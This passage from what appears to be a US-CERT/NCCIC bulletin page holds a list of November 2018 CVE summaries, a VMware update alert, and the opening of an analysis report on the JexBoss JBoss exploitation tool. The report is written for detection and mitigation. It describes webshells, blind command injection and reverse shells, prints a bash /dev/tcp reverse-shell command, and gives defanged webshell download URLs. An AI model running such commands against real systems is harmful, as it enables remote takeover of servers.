    shanghai_shengda_network_development_co -- phpcmsA code injection vulnerability in /type.php in PHPCMS 2008 allows attackers to write arbitrary content to a website cache file with a controllable filename, leading to arbitrary code execution. The PHP code is sent via the template parameter, and is written to a data/cache_template/*.tpl.php file along with a "<?php function " substring.2018-11-09not yet calculatedCVE-2018-19127
    MISC
    shangtao_information_technology_co -- wstmartWSTMart 2.0.7 has CSRF via the index.php/admin/staffs/add.html URI.2018-11-09not yet calculatedCVE-2018-19138
    MISC
    sparksuite -- simplemdeSimpleMDE 1.11.2 has XSS via an onerror attribute of a crafted IMG element, or via certain input with [ and ( characters, which is mishandled during construction of an A element.2018-11-07not yet calculatedCVE-2018-19057
    MISC
    squid -- squidSquid before 4.4, when SNMP is enabled, allows a denial of service (Memory Leak) via an SNMP packet.2018-11-09not yet calculatedCVE-2018-19132
    MISC
    MISC
    MISC
    squid -- squid
     
    Squid before 4.4 has XSS via a crafted X.509 certificate during HTTP(S) error page generation for certificate errors.2018-11-09not yet calculatedCVE-2018-19131
    MISC
    MISC
    MISC
    telexy -- qpathAn issue was discovered in Telexy QPath 5.4.462. A low privileged authenticated user supplying a specially crafted serialized request to AdanitDataService.svc may modify user information, including but not limited to email address, username, and password, of other user accounts. The simplest attack approach is for the attacker to intercept their own password-change request and modify the username before the request reaches the server. Also, changing a victim's email address can have a similar account-takeover consequence.2018-11-08not yet calculatedCVE-2018-7718
    MISC
    texas_instruments -- multiple_devicesTexas Instruments BLE-STACK v2.2.1 for SimpleLink CC2640 and CC2650 devices allows remote attackers to execute arbitrary code via a malformed packet that triggers a buffer overflow.2018-11-06not yet calculatedCVE-2018-16986
    CONFIRM
    BID
    SECTRACK
    MISC
    CISCO
    CERT-VN
    tianti -- tiantitianti 2.3 has reflected XSS in the user management module via the tianti-module-admin/user/list userName parameter.2018-11-07not yet calculatedCVE-2018-19091
    MISC
    tianti -- tiantitianti 2.3 allows remote authenticated users to bypass intended permission restrictions by visiting tianti-module-admin/cms/column/list directly to read the column list page or edit a column.2018-11-08not yet calculatedCVE-2018-19109
    MISC
    tianti -- tiantiThe skin-management feature in tianti 2.3 allows remote authenticated users to bypass intended permission restrictions by visiting tianti-module-admin/user/skin/list directly because controller\usercontroller.java maps a /skin/list request to the function skinList, and lacks an authorization check.2018-11-08not yet calculatedCVE-2018-19110
    MISC
    tianti -- tiantitianti 2.3 has stored XSS in the article management module via an article title.2018-11-07not yet calculatedCVE-2018-19090
    MISC
    tianti -- tiantitianti 2.3 has stored XSS in the userlist module via the tianti-module-admin/user/ajax/save_role name parameter, which is mishandled in tianti-module-admin\src\main\webapp\WEB-INF\views\user\user_list.jsp.2018-11-07not yet calculatedCVE-2018-19089
    MISC
    tibco -- active_spacesThe administrative daemon (tibdgadmind) of TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition, TIBCO ActiveSpaces - Developer Edition, and TIBCO ActiveSpaces - Enterprise Edition contains a vulnerability which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition: 3.3.0; 3.4.0; 3.5.0, TIBCO ActiveSpaces - Developer Edition: 3.0.0; 3.1.0; 3.3.0; 3.4.0; 3.5.0, and TIBCO ActiveSpaces - Enterprise Edition: 3.0.0; 3.1.0; 3.2.0; 3.3.0; 3.4.0; 3.5.0.2018-11-06not yet calculatedCVE-2018-12411
    BID
    MISC
    CONFIRM
    tibco -- enterprise_messaging_serviceThe Central Administration server (emsca) component of TIBCO Software Inc.'s TIBCO Enterprise Messaging Service, TIBCO Enterprise Messaging Service - Community Edition, and TIBCO Enterprise Messaging Service - Developer Edition contains a vulnerability which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc.'s TIBCO Enterprise Messaging Service: versions up to and including 8.4.0, TIBCO Enterprise Messaging Service - Community Edition: versions up to and including 8.4.0, and TIBCO Enterprise Messaging Service - Developer Edition versions up to and including 8.4.0.2018-11-06not yet calculatedCVE-2018-12415
    BID
    MISC
    CONFIRM
    tibco -- ftl
     
    The realm server (tibrealmserver) component of TIBCO Software Inc. TIBCO FTL - Community Edition, TIBCO FTL - Developer Edition, and TIBCO FTL - Enterprise Edition contains a vulnerability which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc. TIBCO FTL - Community Edition: versions up to and including 5.4.0, TIBCO FTL - Developer Edition: versions up to and including 5.4.0, TIBCO FTL - Enterprise Edition: versions up to and including 5.4.0.2018-11-06not yet calculatedCVE-2018-12412
    BID
    MISC
    CONFIRM
    tibco -- messagingThe Schema repository server (tibschemad) component of TIBCO Software Inc.'s TIBCO Messaging - Apache Kafka Distribution - Schema Repository - Community Edition, and TIBCO Messaging - Apache Kafka Distribution - Schema Repository - Enterprise Edition contains a vulnerability which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc. TIBCO Messaging - Apache Kafka Distribution - Schema Repository - Community Edition: 1.0.0, and TIBCO Messaging - Apache Kafka Distribution - Schema Repository - Enterprise Edition: 1.0.0.2018-11-06not yet calculatedCVE-2018-12413
    MISC
    CONFIRM
    tibco -- multiple_productsThe Rendezvous Routing Daemon (rvrd), Rendezvous Secure Routing Daemon (rvrsd), Rendezvous Secure Daemon (rvsd), Rendezvous Cache (rvcache), and Rendezvous Daemon Manager (rvdm) components of TIBCO Software Inc.'s TIBCO Rendezvous, TIBCO Rendezvous Developer Edition, TIBCO Rendezvous for z/Linux, TIBCO Rendezvous for z/OS, TIBCO Rendezvous Network Server, TIBCO Substation ES contain vulnerabilities which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc.'s TIBCO Rendezvous: versions up to and including 8.4.5, TIBCO Rendezvous Developer Edition: versions up to and including 8.4.5, TIBCO Rendezvous for z/Linux: versions up to and including 8.4.5, TIBCO Rendezvous for z/OS: versions up to and including 8.4.5, TIBCO Rendezvous Network Server: versions up to and including 1.1.2, and TIBCO Substation ES: versions up to and including 2.12.2.2018-11-06not yet calculatedCVE-2018-12414
    BID
    MISC
    CONFIRM
    vanilla -- vanillaVanilla 2.6.x before 2.6.4 allows remote code execution.2018-11-03not yet calculatedCVE-2018-18903
    MISC
    MISC
    MISC
    wecenter -- wecenterWeCenter 3.2.0 through 3.2.2 has XSS in the views/default/question/index.tpl.html htmlspecialchars_decode function via the /?/publish/ajax/publish_question/ question_content parameter.2018-11-07not yet calculatedCVE-2018-19083
    MISC
    wordpress -- wordpressThe WP Editor.md plugin 10.0.1 for WordPress allows XSS via the comment area.2018-11-04not yet calculatedCVE-2018-18919
    MISC
    wuzhicms -- wuzhicmsAn issue was discovered in WUZHI CMS 4.1.0. There is stored XSS in index.php?m=core&f=index via an ontoggle attribute to details/open/ within a second input field.2018-11-05not yet calculatedCVE-2018-18938
    MISC
    wuzhicms -- wuzhicmsAn issue was discovered in WUZHI CMS 4.1.0. There is stored XSS in index.php?m=core&f=index via a seventh input field.2018-11-05not yet calculatedCVE-2018-18939
    MISC
    xiph -- icecast
     
    A buffer overflow was discovered in the URL-authentication backend of the Icecast before 2.4.4. If the backend is enabled, then any malicious HTTP client can send a request for that specific resource including a crafted header, leading to denial of service and potentially remote code execution.2018-11-05not yet calculatedCVE-2018-18820
    MLIST
    SECTRACK
    GENTOO
    DEBIAN
    yzmcms -- yzmcmsAn issue was discovered in YzmCMS v5.2. It has XSS via a search/index/archives/pubtime/ query string, as demonstrated by the search/index/archives/pubtime/1526387722/page/1.html URI. NOTE: this does not obtain a user's cookie.2018-11-07not yet calculatedCVE-2018-19092
    MISC
    zoho_manageengine -- network_configuration_manager_and_opmanagerAn XML External Entity injection (XXE) vulnerability exists in Zoho ManageEngine Network Configuration Manager and OpManager before 12.3.214 via the RequestXML parameter in a /devices/ProcessRequest.do GET request. For example, the attacker can trigger the transmission of local files to an arbitrary remote FTP server.2018-11-05not yet calculatedCVE-2018-18980
    MISC
    MISC
    zoho_manageengine -- opmanagerZoho ManageEngine OpManager 12.3 before 123222 has SQL Injection via Mail Server settings.2018-11-05not yet calculatedCVE-2018-18949
    MISC
    zyxel -- zywall_usg_devicesZyXEL ZyWALL USG 2.12 AQQ.2 and 3.30 AQQ.7 devices are affected by a CSRF vulnerability via a cgi-bin/zysh-cgi cmd action to add a user account. This account's access could, for example, subsequently be used for stored XSS.2018-11-10not yet calculatedCVE-2017-17550
    MISC
    Back to top

    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 09, 2018

    VMware has released security updates to address vulnerabilities in ESXi, Workstation, and Fusion. An attacker could exploit these vulnerabilities to take control of an affected system.

    NCCIC encourages users and administrators to review the VMware Security Advisory VMSA-2018-0027 and apply the necessary updates.


    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 08, 2018

    NCCIC has released Analysis Report (AR) AR18-312A: JexBoss - JBoss Verify and EXploitation Tool. Cyber threat actors use JexBoss to remotely access victims' systems. The report provides information on JexBoss' capabilities, as well as suggestions for detection and mitigation.

    NCCIC encourages users and administrators to review AR18-312A for more information.


    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 08, 2018

    Summary

    JBoss Verify and EXploitation tool (JexBoss) is an open-source tool used by cybersecurity hunt teams (sometimes referred to as ?red teams?) and auditors to conduct authorized security assessments. Threat actors use this tool maliciously to test and exploit vulnerabilities in JBoss Application Server (JBoss AS)?now WildFly?and a variety of Java applications and platforms. JexBoss automates all the phases of a cyberattack, making it a powerful and easy-to-use weapon in a threat actor?s cyber arsenal.

    This report provides a detailed analysis of JexBoss? functionality, along with detection, response, prevention, and mitigation recommendations.

    Description

    JexBoss

    JexBoss is a tool used to test and exploit vulnerabilities in Java applications and platforms, including the JBoss AS/WildFly web server framework. JexBoss is written in the Python programming language using standard Python libraries. JexBoss is run from the command-line interface (CLI) and operated using a console interface. JexBoss was released as an open-source tool on GitHub in November 2014. JexBoss? author regularly added new features and exploits until March 2017.

    Early versions of JexBoss specifically targeted JBoss AS versions 3?6. JexBoss has since evolved into a framework that can be used to test and exploit generic Java-related vulnerabilities over HyperText Transfer Protocol (HTTP).

    In addition to testing JBoss AS for weak default configurations, JexBoss includes exploits for a variety of known vulnerabilities in Java-based frameworks, including some versions of Java Server Faces, Java Seam Framework, Remote Method Invocation over HTTP, Jenkins CLI, Remote Java Management Extension (JMX), and Apache Struts.

    JexBoss also offers attackers the ability to target deserialization vulnerabilities in generic Java applications and servlets by allowing an attacker to specifically target Uniform Resource Locators (URLs) and HTTP POST parameters. This capability can help attackers customize their attacks against their target and exploit zero-day Java deserialization vulnerabilities.

    JexBoss? ultimate goal is to provide the attacker with a means of executing arbitrary operating system (OS) commands on the target host. This is achieved by using one of the following mechanisms:

    • Installation of a webshell ? allows an attacker to submit OS commands to a particular HTTP URL and receive the output of the executed command in the HTTP response.
    • Blind command injection ? allows an attacker to submit OS commands as part of a packaged exploit for a specific vulnerability. The command will be executed, but the attacker will not see the output.
    • Establishment of a reverse shell ? both a webshell and a blind command injection can facilitate a third method of executing arbitrary OS commands: the establishment of a reverse shell. In the establishment of a reverse shell, the target initiates a Transmission Control Protocol (TCP) connection with the host and port of the attacker?s choice, after which commands and command outputs are transferred over that new connection.

    JBoss AS/WildFly

    JBoss AS/WildFly is a Java-based web server framework that simplifies the process of installing, deploying, and maintaining servlets. JBoss AS was released in 2002 as JBoss AS version 3 and was under continued development until 2012, with the final release of JBoss AS 7.1.1. JBoss AS 7.1.1 was then rebranded under the community project WildFly, which remains under continued development and maintenance. Legacy versions of JBoss AS (particularly versions 6 and older) have unpatched security vulnerabilities because they are no longer maintained. In August 2018, NCCIC?s search via the Shodan search engine showed at least 28,060 web servers running outdated and unsupported JBoss AS software.

    Reported Use of JexBoss

    In March 2016, the Cisco Talos Intelligence Group (Talos) investigated a widespread ransomware campaign known as SamSam, which was targeting the healthcare industry.[1] Talos identified numerous instances where the attackers used JexBoss to gain initial access to the target network through vulnerable versions of JBoss AS. The attackers then moved laterally to reach the intended ransomware targets. This campaign was the first widely reported use of JexBoss.

    The April 2017 Symantec Internet Security Threat Report documented an intrusion by the Iran-based Chafer espionage group against a target in Turkey. In that intrusion, Chafer used JexBoss to identify and exploit a vulnerable version of JBoss AS, then moved laterally into other computers on the victim?s network.[2]

    These two instances illustrate threat actors? use of JexBoss to gain initial access to vulnerable internet-facing versions of JBoss AS. The threat actors leveraged their initial access to move deeper into a victim?s network. The success of these exploits highlight the victims? weak web server sustainment practices (i.e., failure to upgrade to a more secure version of JBoss AS/Wildfly).

    Although more commonly used by threat actors, cybersecurity hunt teams also use JexBoss to evaluate the security of Java web platforms. When a hunt team finds a vulnerable web server, they can leverage JexBoss to pivot into other systems on the target network, which provides a more comprehensive security evaluation.

    Executing JexBoss

    JexBoss can be run from most standard OSs. To show JexBoss? interface and analyze the tool?s behavior, NCCIC ran JexBoss from an Ubuntu Linux system against a vulnerable version of JBoss AS 6.1.0 in a secured test environment.

    When run without any command-line options, JexBoss? default behavior is to display a banner followed by a list of command-line option examples that demonstrate different ways to run JexBoss. JexBoss then exits without performing any further actions.

    An attacker can supply command-line options to JexBoss to alter the tool?s default behavior. A command-line option (hereafter known as an option) modifies the operation of a command. The command?s program determines the effect of the option. Options follow the command name on the command line, separated by spaces. Some options require a value to specify variable parameters.

    JexBoss Modes

    An attacker can run JexBoss in one of three ?modes:?

    • Standalone mode ? this is JexBoss? default mode, used to scan a single target;
    • Auto-scan mode ? this mode is used to identify and scan all possible targets in a network; and
    • File-scan mode ? this mode is used to scan targets specified in a file.

    Each scan involves the attacker?s computer connecting to the target computer to probe for vulnerabilities that JexBoss has the ability to exploit. After a scan completes, JexBoss will not automatically attempt to exploit a target unless given additional options or instructions.

    Standalone Mode

    The ?mode standalone option instructs JexBoss to run in standalone mode, targeting a single host. Standalone mode is the default mode, so this option may be omitted from the command line.

    Standalone mode requires either the ?host HOST or the ?u HOST option, the value specifying the target to scan. (The ?host HOST and ?u HOST options behave identically.) The HOST value indicates the target?s network protocol, host (Internet Protocol [IP] address or domain name), and port. In the example shown in figure 1, JexBoss will scan the target host at IP address 127[.]0[.]0[.]1 using HTTP and TCP port 8080.

    Note: for the remainder of this report, if two options behave identically, they will be shown with a slash (?/?) between them. For example, the -host HOST and -u HOST options will be shown as -host/-u HOST.

    A screenshot of the JexBoss interface showing the target IP address on the command-line

    Figure 1: JexBoss screenshot ? specify target on the command-line

    Note: all JexBoss screenshots in this report show JexBoss in standalone mode.

    Auto-Scan Mode

    The -mode auto-scan option instructs JexBoss to use auto-scan mode to identify and scan multiple hosts in a network block. This mode makes use of additional options:

    • -network NETWORK,
    • -ports PORTS, and
    • -results LOGFILENAME.

    NETWORK must be a block of IP addresses in Classless Internet Domain Routing notation. If this option is omitted, JexBoss will scan the /16 network block of the attacking computer?s primary network interface. PORTS must be a comma-separated list of TCP ports. If this option is omitted, JexBoss will scan each IP address for TCP ports 80 and 8080, the standard HTTP ports.

    JexBoss will scan the target block of IP addresses by attempting to connect to each IP address within the network block on each target TCP port. The results of the scan are written to the LOGFILENAME file, or jexboss_auto_scan_results.log if the -results option is omitted.

    File-Scan Mode

    The -mode file-scan option instructs JexBoss to use file-scan mode to scan multiple hosts specified in a file. This mode makes use of two additional options:

    • -file FILENAME, and
    • -out LOGFILENAME.

    The -file option is required for file-scan mode. The contents of the FILENAME file must be a list of targets, one per line, in the same format as required by the -host/-u HOST option. JexBoss will attempt to scan each target specified in the FILENAME file. The results of the scan are written to the LOGFILENAME file, or to jexboss_file_scan_results.log if the -out option is omitted.

    JexBoss Vulnerability Scan

    JexBoss scans targets to test whether they are vulnerable to several known exploits (e.g., weak authentication, Java object deserialization flaws). JexBoss then displays a report with the test results, indicating whether the tested components are exposed, vulnerable, or secured (the indicator for a secured component is ?OK?).


    The results shown in figure 2 indicate that the JBoss admin-console is exposed (i.e., reachable by the attacker) and that the JBoss AS jmx-console and JMXInvokerServlet components are vulnerable to exploitation. The results identify the other applications and frameworks as safe from the JexBoss exploits.

    A JexBoss screenshot showing the results of the tool testing for vulnerabilities in a target host

    Figure 2: JexBoss screenshot ? vulnerability test results

    Note: in a properly managed JBoss AS deployment, the admin-console should not be reachable from the internet; it should only be reachable from trusted internal hosts. However, even if an admin-console is only reachable from trusted internal hosts, dedicated attackers may be able to gain access to those internal hosts and attack the JBoss AS deployment from there.

    JexBoss Exploitation

    After scanning, JexBoss may perform exploitation of identified vulnerabilities depending upon the mode and options chosen.

    When run in standalone mode, JexBoss will display the results of the scan as shown in figure 2 by default. JexBoss will then enter an interactive mode that asks the attacker for input. As shown in figure 3, JexBoss will ask the attacker whether it should try to run an automated exploitation of a specific vulnerability.

    A screenshot from JexBoss that shows the tool asking if the user would like to continue

    Figure 3: JexBoss screenshot ? JexBoss asks permission to continue

    If the attacker answers yes, JexBoss will attempt to exploit the vulnerability in admin-console.

    Figure 4 illustrates JexBoss targeting the admin-console component to determine if the JBoss AS platform is configured with the default administrator username and password?which would be the case for an improperly managed JBoss AS deployment. In the exploit attempt shown in figure 4, JexBoss is attempting to log in to JBoss AS with default credentials. Alternatively, the attacker can specify the credentials JexBoss should attempt to use for the login, by using the -J/--jboss-login options.

    A screenshot of the JexBoss tool showing the tool's interactive exploitation of the target admin-console

    Figure 4: JexBoss screenshot ? interactive exploitation of the admin-console

    Figure 4 indicates success for several phases of the exploit attempt. These phases are listed below.

    • Delivery: JexBoss attempted login with default credentials; this attempt was sent to the JBoss AS admin-console.
      • The success of this attempt is indicated by the phrase: ?Trying to perform authentication with default credentials?.
    • Exploitation: JexBoss successfully logged in with default credentials.
      • The success of this attempt is indicated by the phrase: ?Successfully logged in!?
    • Installation: JexBoss successfully deployed the webshell code.
      • The success of this attempt is indicated by the phrase: ?Successfully deployed code!?
    • Command and Control (C2): JexBoss successfully executed OS commands.
      • The success of this attempt is indicated by the output of the uname -a command, which starts with ?Linux 2f8c3354a075 4.13.0-38?.
    • Action on Objectives: JexBoss successfully attempted this phase, as evident by the presence of the Shell> prompt.
      • The success of this attempt is indicated by the presence of the Shell> prompt. The attacker can use the interactive Shell> prompt to access the JexBoss webshell to execute OS commands and see the command output.
    Automated Exploitation

    The auto-scan and file-scan modes of JexBoss will, by default, only perform the vulnerability scan and report the results. To exploit vulnerabilities when using these modes, the attacker must specify the -A/--auto-exploit option. The -A/--auto-exploit option can also be used in standalone mode, which will remove the yes or no questions asking whether to run automated exploitation, as well as the access to the webshell via the Shell> prompt.

    Webshell Installation

    JexBoss can use a number of different exploits to attempt to install the JexBoss webshell (e.g., exploitation of the JMX console). Once installed, the webshell grants the attacker the ability to execute OS commands remotely by accessing the webshell URL over HTTP or HTTP Secure (HTTPS). The webshell also enables the attacker to receive the command output in response. See the Webshell Analysis section for a description of the JexBoss webshell?s capabilities.


    JexBoss will attempt to exploit the vulnerable component to upload the webshell code over the HTTP session and install the webshell into the web server. If this is not successful?and depending upon the vulnerability?JexBoss may attempt to exploit the vulnerability to induce the web server to download and install the webshell from the internet.
    When used in standalone mode, JexBoss allows the attacker to use the webshell through the interactive Shell> prompt by default, as shown in figure 4.

    Blind Command Injection

    In cases where the installation of the webshell fails or is not possible, such as with application Java deserialization vulnerabilities, JexBoss will attempt to perform a blind command injection. A blind command injection sends a payload?created by the attacker, and which includes an OS command?to the vulnerable component. The vulnerable component processes the payload insecurely and executes the embedded OS command. After the embedded OS command is executed, the output of this execution is not returned to the attacker; therefore, the command injection occurs ?blindly.? The attacker can only determine whether the command was executed successfully by observing the effects of the command execution.

    JexBoss automates the creation and delivery of the payload. When attempting a blind command injection, the default OS command JexBoss packages in the payload is a Linux-specific command to create a reverse shell (see the Reverse Shell section).

    Alternatively, the attacker can specify a different OS command to be executed using the --cmd CMD option. As shown in figure 5, the CMD value is the alternate OS command.

    Note: using the --cmd option in the auto-scan and file-scan modes requires using the -A/--auto-exploit option, otherwise the --cmd option will be ignored.

    A screenshot of the JexBoss tool specifying the injection of an operating system command with the "--cmd" option

    Figure 5: Specifying injected OS command with the --cmd option

    In addition to the exploits against the vulnerable Java-based applications and frameworks shown in figure 2, JexBoss also supports the exploitation of arbitrary Java deserialization vulnerabilities with blind command injection attacks. To accomplish this, the attacker supplies a URL with the -host/-u option, an application parameter into which the payload will be injected with the -H/--post-parameter PARAMETER option, and the -j/--app-unserialize option.

    Reverse Shell

    A reverse shell is a common technique attackers use to execute commands interactively?with keyboard input and text output?through the target system?s built-in command-line programs. JexBoss relays the input and output of the command-line program?usually through the Bash command language interpreter on Linux targets and cmd.exe on Windows targets?through a TCP connection initiated by the target to an IP address and a port of the attacker?s choosing.

    The JexBoss webshell includes the capability to establish a reverse shell. If the attacker issues the jexremote=IP:PORT command to the webshell, the webshell will initiate a connection to the specified IP address and TCP port using Java?s Socket class and relay OS commands to and output from the command-line program through that connection. An example of the jexremote command is shown in figure 4.

    Establishing a reverse shell can also be performed using blind command injection. The default OS command JexBoss packages in the exploit payload to create a reverse shell is

    /bin/bash ?i > /dev/tcp/IP/PORT 0&>1 2>&1

    (where IP and PORT are specified by the attacker). This command redirects the standard input and output of the Bash shell through the victim Linux kernel?s built-in TCP device. For blind command injection, JexBoss obtains the IP and PORT values either from the values supplied in the -r/--reverse-host RHOST:RPORT option, or by prompting the attacker for those values, as shown in figure 6.

    A screenshot of JexBoss obtaining the IP and PORT for the reverse shell

    Figure 6: JexBoss screenshot ? JexBoss obtaining the IP and PORT for the reverse shell

    To establish the TCP connection for the reverse shell, the computer with the IP address specified by the attacker must listen for connections on the specified TCP port. The program that listens for these connections must be able to accept user command-line input and display text output.

    A common tool used to listen for reverse shell connections is Netcat. Figure 7 shows Netcat being used to listen for incoming connections on TCP port 4444. After the reverse shell is established, Netcat shows the shell prompt. The attacker then uses the reverse shell to display the /etc/passwd file to get a listing of user accounts on the target.

    A screenshot of JexBoss that shows the reverse shell using an Netcat listener

    Figure 7: JexBoss screenshot - reverse shell using a Netcat listener

    Attackers often use tools that are more sophisticated than Netcat, such as Meterpreter, to listen for reverse shell connections and control the reverse shell.

    Observable Network Behavior

    Security analysts can observe JexBoss? behavior through passive network traffic monitoring. The observable content depends upon the location of the organization?s network traffic monitoring sensor. Communication between the attacker and the target can be observed at any in-line point?on either the attacker?s local network or the target?s local network. Figure 8 shows an organization?s typical network sensor architecture, including a passive sensor monitoring the packets traversing the organization?s primary ingress and egress points.

    Illustration that shows an organization's typical network sensor location between the organization's network and the internet service provider

    Figure 8: Typical organization's network sensor location

    Version Checks

    Upon its initial execution in any of the scan modes, JexBoss will attempt to retrieve its version information from the internet by reaching out to the following URL:

    hxxp[:]//joaomatosf.com/rnp/releases.txt

    Note: all URLs have been modified to prevent unintentional access.

    If the version of JexBoss being used is not the latest version, the attacker will see a message recommending an upgrade.

    Some versions of the JexBoss webshell include a version check function, which can determine if the webshell being used is the latest version. The target computer will retrieve the latest available webshell version number from the following URL:

    hxxp[:]//webshell.jexboss.net/jsp_version.txt.

    If the installed webshell is not the latest available version, the attacker will see an HTTP response that includes a message recommending the webshell be upgraded, once the attacker accesses the webshell.

    Note: both of the JexBoss version checks detailed above will be evident to an affected organization. The organization will be able to see a lookup of the joaomatosf.com or webshell.jexboss.net domains in their Domain Name System (DNS) queries. These URLs will also be present in the organization?s HTTP traffic. When these artifacts are found on an organization?s network, they indicate JexBoss is present, which is a potential security risk and should be investigated.

    The attacker using JexBoss can disable both version checks by using the -D/--disable-check-updates option.

    Webshell Download

    If the installation of the JexBoss webshell fails, JexBoss may attempt to induce the target server to download and install the JexBoss webshell from the internet at the following URL:

    hxxp[:]//www.joaomatosf.com/rnp/jexws4.war

    If the hxxp[:]//www.joaomatosf.com/rnp/jexws4.war domain or URL is present in an organization?s DNS and HTTP logs, this indicates the JexBoss webshell may be present on the organization?s network. Any organization that identifies this activity should investigate it.

    Note: the filename of the webshell downloaded may change. The public webshell files on hxxp[:]//www.joaomatosf.com reveal multiple jexws*.war files, all of which have basically the same content, but with different MD5 checksums. Using different MD5 checksums allows older versions of JexBoss to induce the web server to download the latest version of the webshell.

    Attack Communication Parameters

    Communications between the attacker and target occur over HTTP or HTTPS, depending upon the target?s web server configuration. HTTPS communications?typically over TCP port 443 or 8443?are encrypted. Organizations that use reverse proxies or some configurations of web application firewalls may be able to observe decrypted network traffic between the perimeter device and the web server. Otherwise, the signs of an attack over HTTPS will only be observable in network appliance logs or on the web server itself.

    Note: for the remainder of this report, unless otherwise noted, network traffic is assumed to be unencrypted HTTP, typically over port 80 or 8080.

    When JexBoss starts, it randomly selects one User-Agent header value from the list in table 1 to use for all HTTP requests to the target web server. The User-Agent values listed in table 1 are legitimate, helping JexBoss traffic blend in with legitimate HTTP traffic. However, they are also dated, which may help organizations differentiate them from normal HTTP traffic.

    Table 1: JexBoss User-Agent header value choices

    HTTP User-Agent Header Value Choices
    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
    Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
    Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
    Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
    Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
    Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0

    Because JexBoss is written in Python, it is easy for sophisticated attackers to alter some of the static data sent to the target web server?including the User-Agent header value choices and parts of the exploits themselves?which would make signature-based detection ineffective.

    Attack Phases

    NCCIC has assessed that JexBoss operates at all seven steps in the Cyber Kill Chain framework. Due to the nature of the vulnerabilities and how they are exploited, JexBoss combines some of the steps, resulting in three high-level phases:

    • Phase 1: Reconnaissance;
    • Phase 2: Weaponization, Delivery, Exploitation, and Installation; and
    • Phase 3: C2 and Action on Objectives.
    Phase 1: Reconnaissance

    In Phase 1, JexBoss determines which componentsof the target web server, if any, are exposed and vulnerable. JexBoss connects to the target web server multiple times and makes multiple HTTP requests?using the GET and HEAD methods?to gather this information (see figure 9).

    A scrennshot showing a typical UNiform Resource Identifier (URI) probe

    Figure 9 : Typical Uniform Resource Identifier (URI) probe

    Aside from the references to JexBoss in some URLs, most of these requests look legitimate or benign, with one notable exception, shown in figure 10.

    A screenshot showing code from the JexBoss-specific Apache Struts 2 probe

    Figure 10: JexBoss-specific Apache Struts 2 probe

    The HTTP request shown in figure 10 almost exactly matches the exploit of the Apache Struts 2 vulnerability (CVE-2017-5638) published by Vex Woo in March 2017.[3] However, JexBoss customizes two parts of this snippet by using #gift and #giftarray?instead of #cmd and #cmds?and by using jexboss as the command, which uniquely identifies the activity as being related to JexBoss.

    Note: the HTTP request shown in figure 10 attempts to exploit the Apache Struts 2 vulnerability; however, there is no command execution in this phase?JexBoss is only trying to determine if an exploit is possible.

    Network defenders can deploy intrusion detection system (IDS) signatures?such as those found in the Network IDS and IPS Signatures section?to detect JexBoss? initial reconnaissance activity. However, some of these signatures will fire on attempted exploits, not just successful exploits, which limits their value to the defender.

    Phase 2: Weaponization, Delivery, Exploitation, and Installation

    JexBoss weaponizes exploits in different ways, depending upon the vulnerability being exploited. For example, to exploit the Apache Struts 2 vulnerability (CVE-2017-5638), JexBoss packages the exploit and the OS command to run in the Content-Type HTTP header value that will be delivered to the target web server in a HTTP GET request (see figure 10).

    JexBoss delivers exploits to the target web server over HTTP using GET or POST requests for URIs and data specific to the vulnerabilities.

    The exploits JexBoss uses are vulnerability-specific. For example, the attack against the admin-console exploits weak configurations of JBoss AS by simply attempting to log in with a username and password. Other attacks attempt to exploit Java deserialization vulnerabilities to install the JexBoss webshell or to execute OS commands.

    Figure 11 shows an example of the weaponization of the JexBoss webshell delivered as a URI query parameter in an HTTP HEAD request, exploiting a vulnerability in the JMX Console (a component of JBoss AS). If this exploit is successful, the victim web server will install the JexBoss webshell.

    A screenshot showing an example of a JexBoss webshell in a URI query parameter

    Figure 11: Example of JexBoss webshell in URI query parameter

    The packet dump shown in figure 12 is an example of the JexBoss webshell weaponized as a Java serialized object delivered to the JMX Invoker Servlet?another component of JBoss AS?in an HTTP POST request. The serialized object in this example (figure 11) begins with the bytes \xAC\xED at byte position 0x01c4?452 bytes into the HTTP request.

    A screenshot that shows an example of a JexBoss webshell packaged in a Java serialized object

    Figure 12: Example of JexBoss webshell packaged in a Java serialized object

    To test whether the installation of the webshell has succeeded, JexBoss will submit an HTTP GET request to the target web server for one of the following URLs:

    • hxxp[:]//victim/jexws4/jexws4.jsp, or
    • hxxp[:]//victim/jexinv4/jexinv4.jsp.

